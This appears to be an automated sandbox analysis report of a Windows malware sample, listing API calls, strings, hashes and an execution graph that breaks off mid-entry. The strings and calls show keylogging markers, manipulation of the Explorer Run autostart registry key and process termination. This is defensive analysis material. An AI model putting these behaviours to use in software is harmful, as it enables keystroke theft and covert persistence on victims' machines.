                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteShell
                                                                    • String ID: !D@$open
                                                                    • API String ID: 587946157-1586967515
                                                                    • Opcode ID: 67e5e550ff4761f43491a7d13f4889bcd198c0aef2fa0d0d01ac44c8cf51853d
                                                                    • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                                    • Opcode Fuzzy Hash: 67e5e550ff4761f43491a7d13f4889bcd198c0aef2fa0d0d01ac44c8cf51853d
                                                                    • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                                    APIs
                                                                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: State
                                                                    • String ID: [CtrlL]$[CtrlR]
                                                                    • API String ID: 1649606143-2446555240
                                                                    • Opcode ID: f934f2a7f97c34cec8605a65b064942ce57b78f2774506a061fea1d29b3ee07f
                                                                    • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                                    • Opcode Fuzzy Hash: f934f2a7f97c34cec8605a65b064942ce57b78f2774506a061fea1d29b3ee07f
                                                                    • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                                    APIs
                                                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Init_thread_footer__onexit
                                                                    • String ID: ,kG$0kG
                                                                    • API String ID: 1881088180-2015055088
                                                                    • Opcode ID: f9f143b1e95ac96eb86707cb7474d167dbc7ad60067a617d51a8135112e2f0db
                                                                    • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                                    • Opcode Fuzzy Hash: f9f143b1e95ac96eb86707cb7474d167dbc7ad60067a617d51a8135112e2f0db
                                                                    • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                                                                    • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteOpenValue
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                    • API String ID: 2654517830-1051519024
                                                                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                    • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                    • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                                    APIs
                                                                    • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ObjectProcessSingleTerminateWait
                                                                    • String ID: pth_unenc
                                                                    • API String ID: 1872346434-4028850238
                                                                    • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                    • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                                    • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                    • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CommandLine
                                                                    • String ID: @)r
                                                                    • API String ID: 3253501508-1972820777
                                                                    • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                                                    • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                                                    • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                                                    • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: CommandLine
                                                                    • String ID: @)r
                                                                    • API String ID: 3253501508-1972820777
                                                                    • Opcode ID: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                    • Instruction ID: 64725d3052c2c9ae7bbd7e52e8b3a5750bb25634a918b02f39acb7dc5bcd530d
                                                                    • Opcode Fuzzy Hash: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                    • Instruction Fuzzy Hash: C0B00278C012209FE744AF7499DC2487FB0B758752B90D8AFD51AD2764D635C047EF20
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                                    • GetLastError.KERNEL32 ref: 00440D35
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1717984340-0
                                                                    • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                    • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                                    • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                    • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                                    APIs
                                                                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                                    • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                                    • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastRead
                                                                    • String ID:
                                                                    • API String ID: 4100373531-0
                                                                    • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                    • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                                    • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                    • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

                                                                    Execution Graph

                                                                    Execution Coverage:6.2%
                                                                    Dynamic/Decrypted Code Coverage:9.2%
                                                                    Signature Coverage:1.3%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:77
                                                                    execution_graph 37630 44dea5 37631 44deb5 FreeLibrary 37630->37631 37632 44dec3 37630->37632 37631->37632 37633 4287c1 37634 4287d2 37633->37634 37637 429ac1 37633->37637 37638 428818 37634->37638 37639 42881f 37634->37639 37648 425711 37634->37648 37635 4259da 37696 416760 11 API calls 37635->37696 37667 425ad6 37637->37667 37703 415c56 11 API calls 37637->37703 37670 42013a 37638->37670 37698 420244 97 API calls 37639->37698 37641 4260dd 37697 424251 120 API calls 37641->37697 37643 4259c2 37643->37667 37690 415c56 11 API calls 37643->37690 37648->37635 37648->37637 37648->37643 37651 429a4d 37648->37651 37654 422aeb memset memcpy memcpy 37648->37654 37658 4260a1 37648->37658 37666 425a38 37648->37666 37686 4227f0 memset memcpy 37648->37686 37687 422b84 15 API calls 37648->37687 37688 422b5d memset memcpy memcpy 37648->37688 37689 422640 13 API calls 37648->37689 37691 4241fc 11 API calls 37648->37691 37692 42413a 90 API calls 37648->37692 37652 429a66 37651->37652 37653 429a9b 37651->37653 37699 415c56 11 API calls 37652->37699 37657 429a96 37653->37657 37701 416760 11 API calls 37653->37701 37654->37648 37702 424251 120 API calls 37657->37702 37695 415c56 11 API calls 37658->37695 37660 429a7a 37700 416760 11 API calls 37660->37700 37666->37643 37693 422640 13 API calls 37666->37693 37694 4226e0 12 API calls 37666->37694 37671 42014c 37670->37671 37674 420151 37670->37674 37713 41e466 97 API calls 37671->37713 37673 420162 37673->37648 37674->37673 37675 4201b3 37674->37675 37676 420229 37674->37676 37677 4201b8 37675->37677 37678 4201dc 37675->37678 37676->37673 37679 41fd5e 86 API calls 37676->37679 37704 41fbdb 37677->37704 37678->37673 37682 4201ff 37678->37682 37710 41fc4c 37678->37710 37679->37673 37682->37673 37685 42013a 97 API calls 37682->37685 37685->37673 37686->37648 37687->37648 37688->37648 37689->37648 37690->37635 37691->37648 37692->37648 37693->37666 37694->37666 37695->37635 37696->37641 37697->37667 37698->37648 37699->37660 37700->37657 37701->37657 37702->37637 37703->37635 37705 41fbf1 37704->37705 37706 41fbf8 37704->37706 37709 41fc39 37705->37709 37728 4446ce 11 API calls 37705->37728 37718 41ee26 37706->37718 37709->37673 37714 41fd5e 37709->37714 37711 41ee6b 86 API calls 37710->37711 37712 41fc5d 37711->37712 37712->37678 37713->37674 37715 41fd65 37714->37715 37716 41fdab 37715->37716 37717 41fbdb 86 API calls 37715->37717 37716->37673 37717->37715 37719 41ee41 37718->37719 37720 41ee32 37718->37720 37729 41edad 37719->37729 37732 4446ce 11 API calls 37720->37732 37723 41ee3c 37723->37705 37726 41ee58 37726->37723 37734 41ee6b 37726->37734 37728->37709 37738 41be52 37729->37738 37732->37723 37733 41eb85 11 API calls 37733->37726 37735 41ee70 37734->37735 37736 41ee78 37734->37736 37791 41bf99 86 API calls 37735->37791 37736->37723 37739 41be6f 37738->37739 37740 41be5f 37738->37740 37744 41be8c 37739->37744 37770 418c63 memset memset 37739->37770 37769 4446ce 11 API calls 37740->37769 37742 41be69 37742->37723 37742->37733 37744->37742 37745 41bf3a 37744->37745 37747 41bed1 37744->37747 37750 41bee7 37744->37750 37773 4446ce 11 API calls 37745->37773 37749 41bef0 37747->37749 37752 41bee2 37747->37752 37749->37750 37751 41bf01 37749->37751 37750->37742 37774 41a453 86 API calls 37750->37774 37753 41bf24 memset 37751->37753 37755 41bf14 37751->37755 37771 418a6d memset memcpy memset 37751->37771 37759 41ac13 37752->37759 37753->37742 37772 41a223 memset memcpy memset 37755->37772 37758 41bf20 37758->37753 37760 41ac52 37759->37760 37761 41ac3f memset 37759->37761 37763 41ac6a 37760->37763 37775 41dc14 19 API calls 37760->37775 37766 41acd9 37761->37766 37764 41aca1 37763->37764 37776 41519d 37763->37776 37764->37766 37767 41acc0 memset 37764->37767 37768 41accd memcpy 37764->37768 37766->37750 37767->37766 37768->37766 37769->37742 37770->37744 37771->37755 37772->37758 37773->37750 37775->37763 37779 4175ed 37776->37779 37787 417570 SetFilePointer 37779->37787 37782 41760a ReadFile 37783 417637 37782->37783 37784 417627 GetLastError 37782->37784 37785 4151b3 37783->37785 37786 41763e memset 37783->37786 37784->37785 37785->37764 37786->37785 37788 41759c GetLastError 37787->37788 37790 4175b2 37787->37790 37789 4175a8 GetLastError 37788->37789 37788->37790 37789->37790 37790->37782 37790->37785 37791->37736 37792 417bc5 37793 417c61 37792->37793 37794 417bda 37792->37794 37794->37793 37795 417bf6 UnmapViewOfFile CloseHandle 37794->37795 37797 417c2c 37794->37797 37799 4175b7 37794->37799 37795->37794 37795->37795 37797->37794 37804 41851e 20 API calls 37797->37804 37800 4175d6 FindCloseChangeNotification 37799->37800 37801 4175c8 37800->37801 37802 4175df 37800->37802 37801->37802 37803 4175ce Sleep 37801->37803 37802->37794 37803->37800 37804->37797 37805 4152c7 malloc 37806 4152ef 37805->37806 37808 4152e2 37805->37808 37809 416760 11 API calls 37806->37809 37809->37808 37810 415308 ??3@YAXPAX 37811 41276d 37812 41277d 37811->37812 37854 4044a4 LoadLibraryW 37812->37854 37814 412785 37815 412789 37814->37815 37862 414b81 37814->37862 37818 4127c8 37868 412465 memset ??2@YAPAXI 37818->37868 37820 4127ea 37880 40ac21 37820->37880 37825 412813 37898 40dd07 memset 37825->37898 37826 412827 37903 40db69 memset 37826->37903 37829 412822 37924 4125b6 ??3@YAXPAX 37829->37924 37831 40ada2 _wcsicmp 37833 41283d 37831->37833 37833->37829 37835 412863 CoInitialize 37833->37835 37908 41268e 37833->37908 37928 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37835->37928 37839 41296f 37930 40b633 37839->37930 37841 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37846 412957 37841->37846 37851 4128ca 37841->37851 37846->37829 37847 4128d0 TranslateAcceleratorW 37848 412941 GetMessageW 37847->37848 37847->37851 37848->37846 37848->37847 37849 412909 IsDialogMessageW 37849->37848 37849->37851 37850 4128fd IsDialogMessageW 37850->37848 37850->37849 37851->37847 37851->37849 37851->37850 37852 41292b TranslateMessage DispatchMessageW 37851->37852 37853 41291f IsDialogMessageW 37851->37853 37852->37848 37853->37848 37853->37852 37855 4044f7 37854->37855 37856 4044cf GetProcAddress 37854->37856 37860 404507 MessageBoxW 37855->37860 37861 40451e 37855->37861 37857 4044e8 FreeLibrary 37856->37857 37858 4044df 37856->37858 37857->37855 37859 4044f3 37857->37859 37858->37857 37859->37855 37860->37814 37861->37814 37863 414b8a 37862->37863 37864 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37862->37864 37934 40a804 memset 37863->37934 37864->37818 37867 414b9e GetProcAddress 37867->37864 37869 4124e0 37868->37869 37870 412505 ??2@YAPAXI 37869->37870 37871 41251c 37870->37871 37876 412521 37870->37876 37956 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37871->37956 37945 444722 37876->37945 37879 41259b wcscpy 37879->37820 37961 40b1ab ??3@YAXPAX ??3@YAXPAX 37880->37961 37882 40ad76 37962 40aa04 37882->37962 37885 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37888 40ac5c 37885->37888 37886 40ad4b 37886->37882 37985 40a9ce 37886->37985 37888->37882 37888->37885 37888->37886 37889 40ace7 ??3@YAXPAX 37888->37889 37965 40a8d0 37888->37965 37977 4099f4 37888->37977 37889->37888 37893 40a8d0 7 API calls 37893->37882 37894 40ada2 37895 40adc9 37894->37895 37896 40adaa 37894->37896 37895->37825 37895->37826 37896->37895 37897 40adb3 _wcsicmp 37896->37897 37897->37895 37897->37896 37990 40dce0 37898->37990 37900 40dd3a GetModuleHandleW 37995 40dba7 37900->37995 37904 40dce0 3 API calls 37903->37904 37905 40db99 37904->37905 38067 40dae1 37905->38067 38081 402f3a 37908->38081 37910 412766 37910->37829 37910->37835 37911 4126d3 _wcsicmp 37912 4126a8 37911->37912 37912->37910 37912->37911 37914 41270a 37912->37914 38115 4125f8 7 API calls 37912->38115 37914->37910 38084 411ac5 37914->38084 37925 4125da 37924->37925 37926 4125f0 37925->37926 37927 4125e6 DeleteObject 37925->37927 37929 40b1ab ??3@YAXPAX ??3@YAXPAX 37926->37929 37927->37926 37928->37841 37929->37839 37931 40b640 37930->37931 37932 40b639 ??3@YAXPAX 37930->37932 37933 40b1ab ??3@YAXPAX ??3@YAXPAX 37931->37933 37932->37931 37933->37815 37935 40a83b GetSystemDirectoryW 37934->37935 37936 40a84c wcscpy 37934->37936 37935->37936 37941 409719 wcslen 37936->37941 37939 40a881 LoadLibraryW 37940 40a886 37939->37940 37940->37864 37940->37867 37942 409724 37941->37942 37943 409739 wcscat LoadLibraryW 37941->37943 37942->37943 37944 40972c wcscat 37942->37944 37943->37939 37943->37940 37944->37943 37946 444732 37945->37946 37947 444728 DeleteObject 37945->37947 37957 409cc3 37946->37957 37947->37946 37949 412551 37950 4010f9 37949->37950 37951 401130 37950->37951 37952 401134 GetModuleHandleW LoadIconW 37951->37952 37953 401107 wcsncat 37951->37953 37954 40a7be 37952->37954 37953->37951 37955 40a7d2 37954->37955 37955->37879 37955->37955 37956->37876 37960 409bfd memset wcscpy 37957->37960 37959 409cdb CreateFontIndirectW 37959->37949 37960->37959 37961->37888 37963 40aa14 37962->37963 37964 40aa0a ??3@YAXPAX 37962->37964 37963->37894 37964->37963 37966 40a8eb 37965->37966 37967 40a8df wcslen 37965->37967 37968 40a906 ??3@YAXPAX 37966->37968 37969 40a90f 37966->37969 37967->37966 37970 40a919 37968->37970 37971 4099f4 3 API calls 37969->37971 37972 40a932 37970->37972 37973 40a929 ??3@YAXPAX 37970->37973 37971->37970 37975 4099f4 3 API calls 37972->37975 37974 40a93e memcpy 37973->37974 37974->37888 37976 40a93d 37975->37976 37976->37974 37978 409a41 37977->37978 37979 4099fb malloc 37977->37979 37978->37888 37981 409a37 37979->37981 37982 409a1c 37979->37982 37981->37888 37983 409a30 ??3@YAXPAX 37982->37983 37984 409a20 memcpy 37982->37984 37983->37981 37984->37983 37986 40a9e7 37985->37986 37987 40a9dc ??3@YAXPAX 37985->37987 37988 4099f4 3 API calls 37986->37988 37989 40a9f2 37987->37989 37988->37989 37989->37893 38014 409bca GetModuleFileNameW 37990->38014 37992 40dce6 wcsrchr 37993 40dcf5 37992->37993 37994 40dcf9 wcscat 37992->37994 37993->37994 37994->37900 38015 44db70 37995->38015 37999 40dbfd 38018 4447d9 37999->38018 38002 40dc34 wcscpy wcscpy 38044 40d6f5 38002->38044 38003 40dc1f wcscpy 38003->38002 38006 40d6f5 3 API calls 38007 40dc73 38006->38007 38008 40d6f5 3 API calls 38007->38008 38009 40dc89 38008->38009 38010 40d6f5 3 API calls 38009->38010 38011 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38010->38011 38050 40da80 38011->38050 38014->37992 38016 40dbb4 memset memset 38015->38016 38017 409bca GetModuleFileNameW 38016->38017 38017->37999 38019 4447f4 38018->38019 38020 40dc1b 38019->38020 38021 444807 ??2@YAPAXI 38019->38021 38020->38002 38020->38003 38022 44481f 38021->38022 38023 444873 _snwprintf 38022->38023 38024 4448ab wcscpy 38022->38024 38057 44474a 8 API calls 38023->38057 38026 4448bb 38024->38026 38058 44474a 8 API calls 38026->38058 38027 4448a7 38027->38024 38027->38026 38029 4448cd 38059 44474a 8 API calls 38029->38059 38031 4448e2 38060 44474a 8 API calls 38031->38060 38033 4448f7 38061 44474a 8 API calls 38033->38061 38035 44490c 38062 44474a 8 API calls 38035->38062 38037 444921 38063 44474a 8 API calls 38037->38063 38039 444936 38064 44474a 8 API calls 38039->38064 38041 44494b 38065 44474a 8 API calls 38041->38065 38043 444960 ??3@YAXPAX 38043->38020 38045 44db70 38044->38045 38046 40d702 memset GetPrivateProfileStringW 38045->38046 38047 40d752 38046->38047 38048 40d75c WritePrivateProfileStringW 38046->38048 38047->38048 38049 40d758 38047->38049 38048->38049 38049->38006 38051 44db70 38050->38051 38052 40da8d memset 38051->38052 38053 40daac LoadStringW 38052->38053 38056 40dac6 38053->38056 38055 40dade 38055->37829 38056->38053 38056->38055 38066 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38056->38066 38057->38027 38058->38029 38059->38031 38060->38033 38061->38035 38062->38037 38063->38039 38064->38041 38065->38043 38066->38056 38077 409b98 GetFileAttributesW 38067->38077 38069 40daea 38070 40daef wcscpy wcscpy GetPrivateProfileIntW 38069->38070 38076 40db63 38069->38076 38078 40d65d GetPrivateProfileStringW 38070->38078 38072 40db3e 38079 40d65d GetPrivateProfileStringW 38072->38079 38074 40db4f 38080 40d65d GetPrivateProfileStringW 38074->38080 38076->37831 38077->38069 38078->38072 38079->38074 38080->38076 38116 40eaff 38081->38116 38085 411ae2 memset 38084->38085 38086 411b8f 38084->38086 38156 409bca GetModuleFileNameW 38085->38156 38098 411a8b 38086->38098 38088 411b0a wcsrchr 38089 411b22 wcscat 38088->38089 38090 411b1f 38088->38090 38157 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38089->38157 38090->38089 38092 411b67 38158 402afb 38092->38158 38096 411b7f 38214 40ea13 SendMessageW memset SendMessageW 38096->38214 38099 402afb 27 API calls 38098->38099 38100 411ac0 38099->38100 38101 4110dc 38100->38101 38102 41113e 38101->38102 38107 4110f0 38101->38107 38239 40969c LoadCursorW SetCursor 38102->38239 38104 411143 38240 4032b4 38104->38240 38258 444a54 38104->38258 38105 4110f7 _wcsicmp 38105->38107 38106 411157 38108 40ada2 _wcsicmp 38106->38108 38107->38102 38107->38105 38261 410c46 10 API calls 38107->38261 38111 411167 38108->38111 38109 4111af 38111->38109 38112 4111a6 qsort 38111->38112 38112->38109 38115->37912 38117 40eb10 38116->38117 38129 40e8e0 38117->38129 38120 40eb6c memcpy memcpy 38121 40ebb7 38120->38121 38121->38120 38122 40ebf2 ??2@YAPAXI ??2@YAPAXI 38121->38122 38124 40d134 16 API calls 38121->38124 38123 40ec65 38122->38123 38125 40ec2e ??2@YAPAXI 38122->38125 38139 40ea7f 38123->38139 38124->38121 38125->38123 38128 402f49 38128->37912 38130 40e8f2 38129->38130 38131 40e8eb ??3@YAXPAX 38129->38131 38132 40e900 38130->38132 38133 40e8f9 ??3@YAXPAX 38130->38133 38131->38130 38134 40e911 38132->38134 38135 40e90a ??3@YAXPAX 38132->38135 38133->38132 38136 40e931 ??2@YAPAXI ??2@YAPAXI 38134->38136 38137 40e921 ??3@YAXPAX 38134->38137 38138 40e92a ??3@YAXPAX 38134->38138 38135->38134 38136->38120 38137->38138 38138->38136 38140 40aa04 ??3@YAXPAX 38139->38140 38141 40ea88 38140->38141 38142 40aa04 ??3@YAXPAX 38141->38142 38143 40ea90 38142->38143 38144 